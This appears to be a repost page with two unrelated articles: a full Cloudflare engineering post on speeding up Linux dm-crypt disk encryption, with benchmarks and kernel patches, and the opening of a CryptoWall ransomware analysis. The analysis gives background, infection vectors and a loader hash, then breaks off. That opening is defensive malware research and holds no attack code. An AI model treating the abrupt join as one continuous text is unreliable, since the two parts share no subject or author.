Speeding up Linux disk encryption

Original text by Ignat Korchagin

Data encryption at rest is a must-have for any modern Internet company. Many companies, however, don’t encrypt their disks, because they fear the potential performance penalty caused by encryption overhead.

Encrypting data at rest is vital for Cloudflare with more than 200 data centres across the world. In this post, we will investigate the performance of disk encryption on Linux and explain how we made it at least two times faster for ourselves and our customers!

Encrypting data at rest

When it comes to encrypting data at rest there are several ways it can be implemented on a modern operating system (OS). Available techniques are tightly coupled with a typical OS storage stack. A simplified version of the storage stack and encryption solutions can be found on the diagram below:

[Figure: simplified storage stack and the layers at which encryption can be applied]

On the top of the stack are applications, which read and write data in files (or streams). The file system in the OS kernel keeps track of which blocks of the underlying block device belong to which files and translates these file reads and writes into block reads and writes; the hardware specifics of the underlying storage device are abstracted away from the file system. Finally, the block subsystem passes the block reads and writes to the underlying hardware using the appropriate device drivers.

The concept of the storage stack is actually similar to the well-known network OSI model, where each layer has a more high-level view of the information and the implementation details of the lower layers are abstracted away from the upper layers. And, similar to the OSI model, one can apply encryption at different layers (think about TLS vs IPsec or a VPN).

For data at rest we can apply encryption either at the block layer (either in hardware or in software) or at the file level (either directly in applications or in the file system).

Block vs file encryption

Generally, the higher in the stack we apply encryption, the more flexibility we have. With application level encryption the application maintainers can apply any encryption code they please to any particular data they need. The downside of this approach is they actually have to implement it themselves and encryption in general is not very developer-friendly: one has to know the ins and outs of a specific cryptographic algorithm, properly generate keys, nonces, IVs etc. Additionally, application level encryption does not leverage OS-level caching and Linux page cache in particular: each time the application needs to use the data, it has to either decrypt it again, wasting CPU cycles, or implement its own decrypted “cache”, which introduces more complexity to the code.

File system level encryption makes data encryption transparent to applications, because the file system itself encrypts the data before passing it to the block subsystem, so files are encrypted regardless of whether the application has crypto support. Also, file systems can be configured to encrypt only a particular directory or to use different keys for different files. This flexibility, however, comes at the cost of a more complex configuration. File system encryption is also considered less secure than block device encryption, as only the contents of the files are encrypted. Files also have associated metadata, like file size, the number of files, the directory tree layout etc., which are still visible to a potential adversary.

Encryption down at the block layer (often referred to as disk encryption or full disk encryption) also makes data encryption transparent to applications and even whole file systems. Unlike file system level encryption it encrypts all data on the disk including file metadata and even free space. It is less flexible though — one can only encrypt the whole disk with a single key, so there is no per-directory, per-file or per-user configuration. From the crypto perspective, not all cryptographic algorithms can be used as the block layer doesn’t have a high-level overview of the data anymore, so it needs to process each block independently. Most common algorithms require some sort of block chaining to be secure, so are not applicable to disk encryption. Instead, special modes were developed just for this specific use-case.

So which layer to choose? As always, it depends… Application and file system level encryption are usually the preferred choice for client systems because of the flexibility. For example, each user on a multi-user desktop may want to encrypt their home directory with a key they own and leave some shared directories unencrypted. On the contrary, on server systems, managed by SaaS/PaaS/IaaS companies (including Cloudflare) the preferred choice is configuration simplicity and security — with full disk encryption enabled any data from any application is automatically encrypted with no exceptions or overrides. We believe that all data needs to be protected without sorting it into «important» vs «not important» buckets, so the selective flexibility the upper layers provide is not needed.

Hardware vs software disk encryption

When encrypting data at the block layer it is possible to do it directly in the storage hardware, if the hardware supports it. Doing so usually gives better read/write performance and consumes fewer resources on the host. However, since most hardware firmware is proprietary, it does not receive as much attention and review from the security community. In the past this led to flaws in some implementations of hardware disk encryption, which rendered the whole security model useless. Microsoft, for example, has since started to prefer software-based disk encryption.

We didn’t want to expose our data and our customers’ data to the risk of using potentially insecure solutions, and we strongly believe in open source. That’s why we rely only on software disk encryption in the Linux kernel, which is open and has been audited by many security professionals across the world.

Linux disk encryption performance

We aim not only to save bandwidth costs for our customers, but to deliver content to Internet users as fast as possible.

At one point we noticed that our disks were not as fast as we would like them to be. Some profiling as well as a quick A/B test pointed to Linux disk encryption. Because not encrypting the data (even if it is supposed-to-be a public Internet cache) is not a sustainable option, we decided to take a closer look into Linux disk encryption performance.

Device mapper and dm-crypt

Linux implements transparent disk encryption via the dm-crypt module, and dm-crypt itself is part of the device mapper kernel framework. In a nutshell, the device mapper allows us to pre/post-process IO requests as they travel between the file system and the underlying block device.

dm-crypt in particular encrypts «write» IO requests before sending them further down the stack to the actual block device and decrypts «read» IO requests before sending them up to the file system driver. Simple and easy! Or is it?

Benchmarking setup

For the record, the numbers in this post were obtained by running specified commands on an idle Cloudflare G9 server out of production. However, the setup should be easily reproducible on any modern x86 laptop.

Generally, benchmarking anything around a storage stack is hard because of the noise introduced by the storage hardware itself. Not all disks are created equal, so for the purpose of this post we will use the fastest disks available out there — that is no disks.

Instead Linux has an option to emulate a disk directly in RAM. Since RAM is much faster than any persistent storage, it should introduce little bias in our results.

The following command creates a 4GB ramdisk:

$ sudo modprobe brd rd_nr=1 rd_size=4194304
$ ls /dev/ram0
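
As a quick sanity check on the size used above: the brd module takes rd_size in KiB, so the value for a ramdisk of a given size can be derived with plain shell arithmetic. This is only a sketch; ramdisk_kib is a hypothetical helper name, not part of brd or any other tool.

```shell
# rd_size is expressed in KiB, so N GiB corresponds to N * 1024 * 1024 KiB.
# ramdisk_kib is a hypothetical helper used only for this illustration.
ramdisk_kib() {
    # $1: desired ramdisk size in GiB
    echo $(( $1 * 1024 * 1024 ))
}

ramdisk_kib 4   # prints 4194304, the rd_size value used above
```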

Now we can set up a dm-crypt instance on top of it thus enabling encryption for the disk. First, we need to generate the disk encryption key, «format» the disk and specify a password to unlock the newly generated key.

$ fallocate -l 2M crypthdr.img
$ sudo cryptsetup luksFormat /dev/ram0 --header crypthdr.img

WARNING!
========
This will overwrite data on crypthdr.img irrevocably.

Are you sure? (Type uppercase yes): YES
Enter passphrase:
Verify passphrase:

Those who are familiar with LUKS/dm-crypt might have noticed we used a LUKS detached header here. Normally, LUKS stores the password-encrypted disk encryption key on the same disk as the data, but since we want to compare read/write performance between encrypted and unencrypted devices, we might accidentally overwrite the encrypted key during our benchmarking later. Keeping the encrypted key in a separate file avoids this problem for the purposes of this post.

Now, we can actually «unlock» the encrypted device for our testing:

$ sudo cryptsetup open --header crypthdr.img /dev/ram0 encrypted-ram0
Enter passphrase for /dev/ram0:
$ ls /dev/mapper/encrypted-ram0
/dev/mapper/encrypted-ram0

At this point we can now compare the performance of encrypted vs unencrypted ramdisk: if we read/write data to /dev/ram0, it will be stored in plaintext. Likewise, if we read/write data to /dev/mapper/encrypted-ram0, it will be decrypted/encrypted on the way by dm-crypt and stored in ciphertext.

It’s worth noting that we’re not creating any file system on top of our block devices to avoid biasing results with a file system overhead.

Measuring throughput

When it comes to storage testing/benchmarking, Flexible I/O tester (fio) is the usual go-to solution. Let’s simulate a simple sequential read/write load with 4K block size on the ramdisk without encryption:

$ sudo fio --filename=/dev/ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=plain
plain: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=21013MB, aggrb=1126.5MB/s, minb=1126.5MB/s, maxb=1126.5MB/s, mint=18655msec, maxt=18655msec
  WRITE: io=21023MB, aggrb=1126.1MB/s, minb=1126.1MB/s, maxb=1126.1MB/s, mint=18655msec, maxt=18655msec

Disk stats (read/write):
  ram0: ios=0/0, merge=0/0, ticks=0/0, in_queue=0, util=0.00%

The above command will run for a long time, so we just stop it after a while. As we can see from the stats, we’re able to read and write with roughly the same throughput, around 1126 MB/s. Let’s repeat the test with the encrypted ramdisk:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=1693.7MB, aggrb=150874KB/s, minb=150874KB/s, maxb=150874KB/s, mint=11491msec, maxt=11491msec
  WRITE: io=1696.4MB, aggrb=151170KB/s, minb=151170KB/s, maxb=151170KB/s, mint=11491msec, maxt=11491msec

Whoa, that’s a drop! We only get ~147 MB/s now, which is more than 7 times slower! And this is on a totally idle machine!
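
The numbers quoted above can be re-derived from the fio output. The sketch below assumes fio reports KB/s with 1 KB = 1024 bytes (its default in this version); kbs_to_mbs and slowdown are hypothetical helper names introduced just for this illustration.

```shell
# Convert a fio "aggrb" value in KB/s to MB/s (assuming 1 MB = 1024 KB).
kbs_to_mbs() {
    awk -v kb="$1" 'BEGIN { printf "%.1f\n", kb / 1024 }'
}

# How many times slower the second throughput is compared to the first.
slowdown() {
    awk -v plain="$1" -v crypt="$2" 'BEGIN { printf "%.1f\n", plain / crypt }'
}

kbs_to_mbs 150874       # encrypted read throughput: prints 147.3
slowdown 1126.5 147.3   # plain vs encrypted: prints 7.6
```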

Maybe, crypto is just slow

The first thing we wanted to ensure was that we were using the fastest crypto. cryptsetup allows us to benchmark all the available crypto implementations on the system to select the best one:

$ sudo cryptsetup benchmark
# Tests are approximate using memory only (no storage IO).
PBKDF2-sha1      1340890 iterations per second for 256-bit key
PBKDF2-sha256    1539759 iterations per second for 256-bit key
PBKDF2-sha512    1205259 iterations per second for 256-bit key
PBKDF2-ripemd160  967321 iterations per second for 256-bit key
PBKDF2-whirlpool  720175 iterations per second for 256-bit key
#  Algorithm | Key |  Encryption |  Decryption
     aes-cbc   128b   969.7 MiB/s  3110.0 MiB/s
 serpent-cbc   128b           N/A           N/A
 twofish-cbc   128b           N/A           N/A
     aes-cbc   256b   756.1 MiB/s  2474.7 MiB/s
 serpent-cbc   256b           N/A           N/A
 twofish-cbc   256b           N/A           N/A
     aes-xts   256b  1823.1 MiB/s  1900.3 MiB/s
 serpent-xts   256b           N/A           N/A
 twofish-xts   256b           N/A           N/A
     aes-xts   512b  1724.4 MiB/s  1765.8 MiB/s
 serpent-xts   512b           N/A           N/A
 twofish-xts   512b           N/A           N/A
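
Rather than reading the table by eye, the row with the highest encryption speed can be picked out with a few lines of awk. This is a sketch that assumes the column layout shown above (algorithm, key size, encryption speed and unit, decryption speed and unit); fastest_encrypt is a hypothetical helper name.

```shell
# Print the algorithm, key size and speed of the fastest *encryption* row.
# Rows without a measured speed (N/A), the header and the PBKDF2 lines are
# skipped because their fourth field is not "MiB/s".
fastest_encrypt() {
    awk '$4 == "MiB/s" && ($3 + 0) > best { best = $3 + 0; pick = $1 " " $2; speed = $3 }
         END { if (pick != "") print pick, speed }'
}

# Sample rows copied from the benchmark output above.
fastest_encrypt <<'EOF'
     aes-cbc   128b   969.7 MiB/s  3110.0 MiB/s
 serpent-cbc   128b           N/A           N/A
     aes-xts   256b  1823.1 MiB/s  1900.3 MiB/s
     aes-xts   512b  1724.4 MiB/s  1765.8 MiB/s
EOF
```

On a real system the same function could be fed directly from the benchmark, for example with sudo cryptsetup benchmark | fastest_encrypt.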

It seems aes-xts with a 256-bit data encryption key is the fastest here. But which one are we actually using for our encrypted ramdisk?

$ sudo dmsetup table /dev/mapper/encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0

We do use aes-xts with a 256-bit data encryption key (count all the zeroes conveniently masked by dmsetup tool — if you want to see the actual bytes, add the --showkeys option to the above command). The numbers do not add up however: cryptsetup benchmark tells us above not to rely on the results, as «Tests are approximate using memory only (no storage IO)», but that is exactly how we’ve set up our experiment using the ramdisk. In a somewhat worse case (assuming we’re reading all the data and then encrypting/decrypting it sequentially with no parallelism) doing back-of-the-envelope calculation we should be getting around (1126 * 1823) / (1126 + 1823) =~696 MB/s, which is still quite far from the actual 147 * 2 = 294 MB/s (total for reads and writes).
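
Both figures in the paragraph above can be reproduced in a few lines. If two stages run strictly one after another at rates a and b, each unit of data costs 1/a + 1/b units of time, so the combined rate is a*b/(a+b). The helper names below are hypothetical, and the sketch assumes the masked key is 64 hex digits long, as implied by a 256-bit key.

```shell
# Combined throughput of two strictly sequential stages: a*b / (a+b).
serial_throughput() {
    awk -v a="$1" -v b="$2" 'BEGIN { printf "%.0f\n", (a * b) / (a + b) }'
}

# Each hex digit of the key printed by dmsetup encodes 4 bits.
key_bits() {
    echo $(( ${#1} * 4 ))
}

serial_throughput 1126 1823       # ramdisk rate and aes-xts 256b rate: prints 696
key_bits "$(printf '%064d' 0)"    # 64 masked hex digits: prints 256
```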

dm-crypt performance flags

While reading the cryptsetup man page we noticed that it has two options prefixed with --perf-, which are probably related to performance tuning. The first one is --perf-same_cpu_crypt with a rather cryptic description:

Perform encryption using the same cpu that IO was submitted on.  The default is to use an unbound workqueue so that encryption work is automatically balanced between available CPUs.  This option is only relevant for open action.

So we enable the option:

$ sudo cryptsetup close encrypted-ram0
$ sudo cryptsetup open --header crypthdr.img --perf-same_cpu_crypt /dev/ram0 encrypted-ram0

Note: according to the latest man page there is also a cryptsetup refresh command, which can be used to enable these options live without having to «close» and «re-open» the encrypted device. Our cryptsetup however didn’t support it yet.

Verifying that the option has really been enabled:

$ sudo dmsetup table encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0 1 same_cpu_crypt

Yes, we can now see same_cpu_crypt in the output, which is what we wanted. Let’s rerun the benchmark:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=1596.6MB, aggrb=139811KB/s, minb=139811KB/s, maxb=139811KB/s, mint=11693msec, maxt=11693msec
  WRITE: io=1600.9MB, aggrb=140192KB/s, minb=140192KB/s, maxb=140192KB/s, mint=11693msec, maxt=11693msec

Hmm, now it is ~136 MB/s, which is slightly worse than before, so no good. What about the second option, --perf-submit_from_crypt_cpus?

Disable offloading writes to a separate thread after encryption.  There are some situations where offloading write bios from the encryption threads to a single thread degrades performance significantly.  The default is to offload write bios to the same thread.  This option is only relevant for open action.

Maybe, we are in the «some situation» here, so let’s try it out:

$ sudo cryptsetup close encrypted-ram0
$ sudo cryptsetup open --header crypthdr.img --perf-submit_from_crypt_cpus /dev/ram0 encrypted-ram0
Enter passphrase for /dev/ram0:
$ sudo dmsetup table encrypted-ram0
0 8388608 crypt aes-xts-plain64 0000000000000000000000000000000000000000000000000000000000000000 0 1:0 0 1 submit_from_crypt_cpus
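
When scripting such experiments, the check for an optional parameter at the end of the table line can be automated instead of done by eye. The following is a minimal sketch; has_opt_param is a hypothetical helper, and the key in the sample line is replaced with a placeholder.

```shell
# Succeeds if the dm-crypt table line in $1 contains the word $2.
# Padding both sides with spaces makes sure only whole words match.
has_opt_param() {
    case " $1 " in
        *" $2 "*) return 0 ;;
        *)        return 1 ;;
    esac
}

# Sample line shaped like the output above, with a placeholder for the key.
line="0 8388608 crypt aes-xts-plain64 <key> 0 1:0 0 1 submit_from_crypt_cpus"

if has_opt_param "$line" submit_from_crypt_cpus; then
    echo "submit_from_crypt_cpus is enabled"
else
    echo "submit_from_crypt_cpus is not enabled"
fi
```

On a live system the first argument would be the output of sudo dmsetup table encrypted-ram0.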

And now the benchmark:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...
Run status group 0 (all jobs):
   READ: io=2066.6MB, aggrb=169835KB/s, minb=169835KB/s, maxb=169835KB/s, mint=12457msec, maxt=12457msec
  WRITE: io=2067.7MB, aggrb=169965KB/s, minb=169965KB/s, maxb=169965KB/s, mint=12457msec, maxt=12457msec

~166 MB/s, which is a bit better, but still not good…

Asking the community

Being desperate we decided to seek support from the Internet and posted our findings to the dm-crypt mailing list, but the response we got was not very encouraging:

If the numbers disturb you, then this is from lack of understanding on your side. You are probably unaware that encryption is a heavy-weight operation…

We decided to do some scientific research on this topic by typing «is encryption expensive» into Google Search, and one of the top results that actually contains meaningful measurements is… our own post about the cost of encryption, but in the context of TLS! This is a fascinating read on its own, but the gist is: modern crypto on modern hardware is very cheap even at Cloudflare scale (doing millions of encrypted HTTP requests per second). In fact, it is so cheap that Cloudflare was the first provider to offer free SSL/TLS for everyone.

Digging into the source code

When trying to use the custom dm-crypt options described above we were curious why they exist in the first place and what that «offloading» is all about. Originally we expected dm-crypt to be a simple «proxy», which just encrypts/decrypts data as it flows through the stack. It turns out dm-crypt does more than just encrypt memory buffers, and a (simplified) diagram of the IO path is presented below:

[Figure: simplified IO path through dm-crypt]

When the file system issues a write request, dm-crypt does not process it immediately; instead it puts it into a workqueue named «kcryptd». In a nutshell, a kernel workqueue just schedules some work (encryption in this case) to be performed at some later time, when it is more convenient. When «the time» comes, dm-crypt sends the request to the Linux Crypto API for actual encryption. However, the modern Linux Crypto API is asynchronous as well, so depending on which particular implementation your system uses, the request will most likely not be processed immediately, but queued again for a «later time». When the Linux Crypto API finally does the encryption, dm-crypt may try to sort pending write requests by putting each request into a red-black tree. Then a separate kernel thread, again at «some time later», actually takes all IO requests in the tree and sends them down the stack.

Now for read requests: this time we need to get the encrypted data from the hardware first, but dm-crypt does not just ask the driver for the data; it queues the request into a different workqueue named «kcryptd_io». At some point later, when we actually have the encrypted data, we schedule it for decryption using the now familiar «kcryptd» workqueue. «kcryptd» will send the request to the Linux Crypto API, which may decrypt the data asynchronously as well.

To be fair the request does not always traverse all these queues, but the important part here is that write requests may be queued up to 4 times in dm-crypt and read requests up to 3 times. At this point we were wondering if all this extra queueing can cause any performance issues. For example, there is a nice presentation from Google about the relationship between queueing and tail latency. One key takeaway from the presentation is:

A significant amount of tail latency is due to queueing effects

So, why are all these queues there and can we remove them?

Git archeology

No-one writes more complex code just for fun, especially for the OS kernel. So all these queues must have been put there for a reason. Luckily, the Linux kernel source is managed by git, so we can try to retrace the changes and the decisions around them.

The «kcryptd» workqueue has been in the source since the beginning of the available history, with the following comment:

Needed because it would be very unwise to do decryption in an interrupt context, so bios returning from read requests get queued here.

So it was for reads only, but even then — why do we care if it is interrupt context or not, if Linux Crypto API will likely use a dedicated thread/queue for encryption anyway? Well, back in 2005 Crypto API was not asynchronous, so this made perfect sense.

In 2006 dm-crypt started to use the «kcryptd» workqueue not only for encryption, but for submitting IO requests:

This patch is designed to help dm-crypt comply with the new constraints imposed by the following patch in -mm: md-dm-reduce-stack-usage-with-stacked-block-devices.patch

It seems the goal here was not to add more concurrency, but rather to reduce kernel stack usage, which makes sense again: the kernel has a common stack across all the code, so it is quite a limited resource. It is worth noting, however, that the Linux kernel stack was expanded in 2014 for x86 platforms, so this might not be a problem anymore.

The first version of the «kcryptd_io» workqueue was added in 2007 with the intent to avoid:

starvation caused by many requests waiting for memory allocation…

The request processing was bottlenecking on a single workqueue here, so the solution was to add another one. Makes sense.

We are definitely not the first ones experiencing performance degradation because of extensive queueing: in 2011 a change was introduced to conditionally revert some of the queueing for read requests:

If there is enough memory, code can directly submit bio instead queuing this operation in a separate thread.

Unfortunately, at that time Linux kernel commit messages were not as verbose as today, so there is no performance data available.

In 2015 dm-crypt started to sort writes in a separate «dmcrypt_write» thread before sending them down the stack:

On a multiprocessor machine, encryption requests finish in a different order than they were submitted. Consequently, write requests would be submitted in a different order and it could cause severe performance degradation.

It does make sense as sequential disk access used to be much faster than the random one and dm-crypt was breaking the pattern. But this mostly applies to spinning disks, which were still dominant in 2015. It may not be as important with modern fast SSDs (including NVME SSDs).

Another part of the commit message is worth mentioning:

…in particular it enables IO schedulers like CFQ to sort more effectively…

It mentions the performance benefits for the CFQ IO scheduler, but Linux schedulers have improved since then to the point that the CFQ scheduler was removed from the kernel in 2018.

The same patchset replaces the sorting list with a red-black tree:

In theory the sorting should be performed by the underlying disk scheduler, however, in practice the disk scheduler only accepts and sorts a finite number of requests. To allow the sorting of all requests, dm-crypt needs to implement its own sorting.

The overhead associated with rbtree-based sorting is considered negligible so it is not used conditionally.

All that makes sense, but it would be nice to have some backing data.

Interestingly, in the same patchset we see the introduction of our familiar «submit_from_crypt_cpus» option:

There are some situations where offloading write bios from the encryption threads to a single thread degrades performance significantly

Overall, we can see that every change was reasonable and needed, however things have changed since then:

  • hardware became faster and smarter
  • Linux resource allocation was revisited
  • coupled Linux subsystems were rearchitected

And many of the design choices above may not be applicable to modern Linux.

The «clean-up»

Based on the research above we decided to try to remove all the extra queueing and asynchronous behaviour and revert dm-crypt to its original purpose: simply encrypt/decrypt IO requests as they pass through. But for the sake of stability and further benchmarking we ended up not removing the actual code, but rather adding yet another dm-crypt option, which bypasses all the queues/threads, if enabled. The flag allows us to switch between the current and new behaviour at runtime under full production load, so we can easily revert our changes should we see any side-effects. The resulting patch can be found on the Cloudflare GitHub Linux repository.

Synchronous Linux Crypto API

From the diagram above we remember that not all queueing is implemented in dm-crypt. The modern Linux Crypto API may also be asynchronous, and for the sake of this experiment we want to eliminate queues there as well. What does «may be» mean, though? The OS may contain different implementations of the same algorithm (for example, hardware-accelerated AES-NI on x86 platforms and generic C-code AES implementations). By default the system chooses the «best» one based on the configured algorithm priority. dm-crypt allows overriding this behaviour and requesting a particular cipher implementation using the capi: prefix. However, there is one problem. Let us actually check the available AES-XTS (this is our disk encryption cipher, remember?) implementations on our system:

$ grep -A 11 'xts(aes)' /proc/crypto
name         : xts(aes)
driver       : xts(ecb(aes-generic))
module       : kernel
priority     : 100
refcnt       : 7
selftest     : passed
internal     : no
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : __xts(aes)
driver       : cryptd(__xts-aes-aesni)
module       : cryptd
priority     : 451
refcnt       : 1
selftest     : passed
internal     : yes
type         : skcipher
async        : yes
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : xts(aes)
driver       : xts-aes-aesni
module       : aesni_intel
priority     : 401
refcnt       : 1
selftest     : passed
internal     : no
type         : skcipher
async        : yes
blocksize    : 16
min keysize  : 32
max keysize  : 64
--
name         : __xts(aes)
driver       : __xts-aes-aesni
module       : aesni_intel
priority     : 401
refcnt       : 7
selftest     : passed
internal     : yes
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
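
To list only the synchronous implementations from output like the above, the name, driver and async fields can be correlated with awk. This is a sketch under the assumption that each /proc/crypto entry lists name and driver before async, as in the output shown; sync_drivers is a hypothetical helper name.

```shell
# Read /proc/crypto-formatted text on stdin and print the driver of every
# entry for algorithm $1 (or its internal "__" variant) marked "async : no".
sync_drivers() {
    awk -v alg="$1" '
        $1 == "name"   { name = $3 }
        $1 == "driver" { driver = $3 }
        $1 == "async"  {
            if ((name == alg || name == ("__" alg)) && $3 == "no")
                print driver
        }
    '
}

# Run against the live system only if /proc/crypto is readable.
if [ -r /proc/crypto ]; then
    sync_drivers 'xts(aes)' < /proc/crypto
fi
```

Fed with the listing above, this would print xts(ecb(aes-generic)) and __xts-aes-aesni.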

We want to explicitly select a synchronous cipher from the above list to avoid queueing effects in threads, but the only two supported are xts(ecb(aes-generic)) (the generic C implementation) and __xts-aes-aesni (the x86 hardware-accelerated implementation). We definitely want the latter as it is much faster (we’re aiming for performance here), but it is suspiciously marked as internal (see internal: yes). If we check the source code:

Mark a cipher as a service implementation only usable by another cipher and never by a normal user of the kernel crypto API

So this cipher is meant to be used only by other wrapper code in the Crypto API and not outside it. In practice this means that the caller of the Crypto API needs to explicitly specify this flag when requesting a particular cipher implementation, but dm-crypt does not do so, because by design it is not part of the Linux Crypto API but rather an «external» user. We already patch the dm-crypt module, so we could just as well add the relevant flag. However, there is another problem with AES-NI in particular: the x86 FPU. «Floating point», you say? Why do we need floating point math to do symmetric encryption, which should only be about bit shifts and XOR operations? We don’t need the math, but AES-NI instructions use some of the CPU registers which are dedicated to the FPU. Unfortunately, the Linux kernel does not always preserve these registers in interrupt context for performance reasons (saving/restoring the FPU state is expensive). But dm-crypt may execute code in interrupt context, so we risk corrupting some other process’s data, and we are back to the «it would be very unwise to do decryption in an interrupt context» statement in the original code.

Our solution to address the above was to create another somewhat «smart» Crypto API module. This module is synchronous and does not roll its own crypto, but is just a «router» of encryption requests:

  • if we can use the FPU (and thus AES-NI) in the current execution context, we just forward the encryption request to the faster, «internal» __xts-aes-aesni implementation (and we can use it here, because now we are part of the Crypto API)
  • otherwise, we just forward the encryption request to the slower, generic C-based xts(ecb(aes-generic)) implementation

Using the whole lot

Let’s walk through the process of using it all together. The first step is to grab the patches and recompile the kernel (or just compile dm-crypt and our xtsproxy modules).

Next, let’s restart our IO workload in a separate terminal, so we can make sure we can reconfigure the kernel at runtime under load:

$ sudo fio --filename=/dev/mapper/encrypted-ram0 --readwrite=readwrite --bs=4k --direct=1 --loops=1000000 --name=crypt
crypt: (g=0): rw=rw, bs=4K-4K/4K-4K/4K-4K, ioengine=psync, iodepth=1
fio-2.16
Starting 1 process
...

In the main terminal make sure our new Crypto API module is loaded and available:

$ sudo modprobe xtsproxy
$ grep -A 11 'xtsproxy' /proc/crypto
driver       : xts-aes-xtsproxy
module       : xtsproxy
priority     : 0
refcnt       : 0
selftest     : passed
internal     : no
type         : skcipher
async        : no
blocksize    : 16
min keysize  : 32
max keysize  : 64
ivsize       : 16
chunksize    : 16

Reconfigure the encrypted disk to use our newly loaded module and enable our patched dm-crypt flag (we have to use low-level dmsetup tool as cryptsetup obviously is not aware of our modifications):

$ sudo dmsetup table encrypted-ram0 --showkeys | sed 's/aes-xts-plain64/capi:xts-aes-xtsproxy-plain64/' | sed 's/$/ 1 force_inline/' | sudo dmsetup reload encrypted-ram0
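
Before piping the rewritten table into dmsetup reload, it may help to preview what the two sed expressions do. The sketch below applies the same substitutions to a sample line with a placeholder instead of the real key; rewrite_table is a hypothetical wrapper name. It assumes, as the command above does, that the existing table line carries no optional parameters yet, since otherwise the parameter count at the end would need adjusting rather than appending.

```shell
# Apply the same two substitutions as the command above:
# 1. switch the cipher spec to the xtsproxy implementation via capi:
# 2. append one optional parameter, force_inline, to the end of the line
rewrite_table() {
    sed 's/aes-xts-plain64/capi:xts-aes-xtsproxy-plain64/' | sed 's/$/ 1 force_inline/'
}

# Dry run on a sample table line; <key> stands in for the real key bytes.
echo "0 8388608 crypt aes-xts-plain64 <key> 0 1:0 0" | rewrite_table
# prints: 0 8388608 crypt capi:xts-aes-xtsproxy-plain64 <key> 0 1:0 0 1 force_inline
```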

We just «loaded» the new configuration, but for it to take effect, we need to suspend/resume the encrypted device:

$ sudo dmsetup suspend encrypted-ram0 && sudo dmsetup resume encrypted-ram0

And now observe the result. We may go back to the other terminal running the fio job and look at the output, but to make things nicer, here’s a snapshot of the observed read/write throughput in Grafana:

[Figure: read throughput, annotated]
[Figure: write throughput, annotated]

Wow, we have more than doubled the throughput! With the total throughput of ~640 MB/s we’re now much closer to the expected ~696 MB/s from above. What about the IO latency? (The await statistic from the iostat reporting tool):

[Figure: IO latency (await), annotated]

The latency has been cut in half as well!
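
To put the throughput figures from this post side by side, the ratios can be computed directly. This is only a sketch based on the approximate totals quoted in the text (~294 MB/s with default dm-crypt, ~640 MB/s with the patches, ~696 MB/s estimated); ratio is a hypothetical helper name.

```shell
# Ratio of two throughput figures, rounded to two decimal places.
ratio() {
    awk -v a="$1" -v b="$2" 'BEGIN { printf "%.2f\n", a / b }'
}

ratio 640 294   # speed-up over default dm-crypt: prints 2.18
ratio 640 696   # share of the back-of-the-envelope estimate: prints 0.92
```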

To production

So far we have been using a synthetic setup with some parts of the full production stack missing, like file systems, real hardware and most importantly, production workload. To ensure we’re not optimising imaginary things, here is a snapshot of the production impact these changes bring to the caching part of our stack:

[Figure: production impact on cache response times]

This graph represents a three-way comparison of the worst-case response times (99th percentile) for a cache hit in one of our servers. The green line is from a server with unencrypted disks, which we will use as baseline. The red line is from a server with encrypted disks with the default Linux disk encryption implementation and the blue line is from a server with encrypted disks and our optimisations enabled. As we can see the default Linux disk encryption implementation has a significant impact on our cache latency in worst case scenarios, whereas the patched implementation is indistinguishable from not using encryption at all. In other words the improved encryption implementation does not have any impact at all on our cache response speed, so we basically get it for free! That’s a win!

We’re just getting started

This post shows how an architecture review can double the performance of a system. Also we reconfirmed that modern cryptography is not expensive and there is usually no excuse not to protect your data.

We are going to submit this work for inclusion in the main kernel source tree, but most likely not in its current form. Although the results look encouraging we have to remember that Linux is a highly portable operating system: it runs on powerful servers as well as small resource constrained IoT devices and on many other CPU architectures as well. The current version of the patches just optimises disk encryption for a particular workload on a particular architecture, but Linux needs a solution which runs smoothly everywhere.

That said, if you think your case is similar and you want to take advantage of the performance improvements now, you may grab the patches and hopefully provide feedback. The runtime flag makes it easy to toggle the functionality on the fly and a simple A/B test may be performed to see if it benefits any particular case or setup. These patches have been running across our wide network of more than 200 data centres on five generations of hardware, so can be reasonably considered stable. Enjoy both performance and security from Cloudflare for all!

Genetic Analysis of CryptoWall Ransomware


Original text by Ryan Cornateanu

A strain of the Crowti ransomware, the variant known as CryptoWall, was first spotted by researchers in early 2013. Ransomware is by nature extraordinarily destructive, but this one in particular went a bit beyond that. Over the next two years, with over 5.25 billion files encrypted and more than 1 million systems infected, this virus definitely made its mark in the pool of cyber weapons. Below you can find a list of the top ten infected countries:

Image for post
Source: Dell Secure Works

CryptoWall is distinct in that its campaign ID initially gets sent back to its C2 servers for verification purposes. The motivation behind these IDs is to track samples by their loader vectors. The one we will be analyzing in our laboratory experiment has the crypt1 ID, which was first seen around February 26th, 2014. The infection vector is still unknown today, but we will be showing how to unpack the loader and extract the main ransomware file. Some of the infections have been caused by drive-by downloads, Cutwail/Upatre, the Infinity/Goon exploit kit, the Magnitude exploit kit, the Nuclear exploit kit/Pony Loader, and Gozi/Neverquest.

Initial Analysis

We will start by providing the hash of the packed loader file:

➜  CryptoWall git:(master) openssl md5 cryptowall.bin
MD5(cryptowall.bin)= 47363b94cee907e2b8926c1be61150c7

